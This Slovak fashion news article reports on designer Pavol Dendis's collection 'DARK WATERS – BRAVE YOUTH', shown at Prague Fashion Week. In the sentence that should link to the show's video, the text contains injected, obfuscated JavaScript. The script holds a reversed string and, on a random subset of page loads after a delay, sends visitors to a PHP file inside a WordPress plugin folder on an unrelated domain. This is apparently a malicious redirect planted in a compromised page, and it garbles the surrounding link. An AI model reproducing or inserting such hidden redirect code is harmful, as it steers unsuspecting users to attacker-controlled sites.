Vyšla nová kolekcia od Pavla Dendisa

| október 4, 2021

Slovenská módna scéna sa teší ďalšiemu z úspešných projektov talentovaného dizajnéra Pavla Dendisa. Svoju najnovšiu kolekciu pod názvom “DARK WATERS – BRAVE YOUTH“ predstavil  aj tento krát v rámci prestížneho týždňa módy Mercedes-Benz Prague Fashion Week v areáli Pražskej tržnice. Už tradične s podporou PRIVEÉ  LOUNGE ponúkol svojim fanúšikom vlastnú kreatívnu víziu v podobe ucelenej sezónnej kolekcie. 

Inšpirovaný odvahou mladosti, uvoľnenosťou sedemdesiatych rokov, príbehom streetwear verzus glamrock  a aj naďalej s dôrazom na krajčírske remeslo rozpoznateľné v prepracovaných detailoch dizajnér tentokrát  k svojej typicky komfortnej zóne čiernej farebnosti pridal červenú, symbolizujúcu krv, život a vitalitu.  

Mierne eerie atmosféra s prvkami trance ešte viac upriamila pozornosť na odvážnosť a silu kolekcie  predvedenej v štýle fast catwalk. Priehľadné ale aj pevné materiály ako vlna, hodváb, bavlna či koža boli  zahliadnuté v štruktúrach, so vzormi a v kombináciách rôznych možností čiernej, čím nezaostávali za  myšlienkou generácie, ktorá hrdo prezentuje svoj názor outfitom ako jednoznačnou súčasťou svojej  osobnosti.

 

Dôraz na detail v podobe odhalenej hrude, oversize pánskych voľných siluet, surových švov  a čierno-čiernej kombinácie bol jednoznačne znakom oslavy mladosti, odvahy a koreňov, ku ktorým sa  dizajnér v rámci svojej tvorby vrátil. Názov kolekcie “DARK WATERS BRAVE YOUTH“ je parafrázou na  ducha doby, temné vody, svet v ktorom dnes žijeme a ten produkuje mládež, ktorá́ je odvážna a reaguje na  aktuálne dianie – chce zmenu.  

Kolekcia “DARK WATERS – BRAVE YOUTH“ by PAVOL DENDIS x PRIVÉE LOUNGE je dostupná exkluzívne v ENVY x PRIVEÉ Beauty & Fashion Lounge. Celý záznam prehliadky si môžete pozrieť online na odkaze $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“‘php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}PMo&feature=youtu.be”>tu. Pre viac fotografií neprehliadnite našu fotogalériu.

Foto a zdroj: PR

Tags:

Category: HOMEPAGE, VYCHYTÁVKY

Comments are closed.